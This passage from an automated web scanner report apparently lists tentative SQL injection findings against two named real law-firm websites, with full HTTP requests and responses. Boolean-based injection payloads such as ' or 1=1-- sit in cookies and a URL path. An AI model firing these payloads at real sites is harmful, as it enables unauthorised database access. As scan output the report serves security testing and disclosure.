User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.62. http://www.curtis.com/sitecontent.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 70094951%20or%201%3d1--%20 and 70094951%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d1--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d2--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.63. http://www.curtis.com/sitecontent.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 15928176'%20or%201%3d1--%20 and 15928176'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.64. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10251358'%20or%201%3d1--%20 and 10251358'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:39 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.65. http://www.friedfrank.com/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 77794298'%20or%201%3d1--%20 and 77794298'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.177794298'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 10:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 21-Apr-2010 10:37:47 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.177794298'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 10:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31400776;path=/
Set-Cookie: CFTOKEN=41635339;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>


...[SNIP]...

1.66. http://www.friedfrank.com/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 66107724'%20or%201%3d1--%20 and 66107724'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)66107724'%20or%201%3d1--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 10:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 21-Apr-2010 10:37:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)66107724'%20or%201%3d2--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 10:37:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31400753;path=/
Set-Cookie: CFTOKEN=96108296;path=/
Content-Type: text/html; charset=UTF-8


       
   
   
   
   
   
   
   
   
   
   

   
   
   
   

   
   
   
   
   
               


   
   
   
   
   
   
   
   

       
   
   
   
   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>


...[SNIP]...

1.67. http://www.friedfrank.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico'%20and%201%3d1--%20 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /favicon.ico'%20and%201%3d2--%20 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
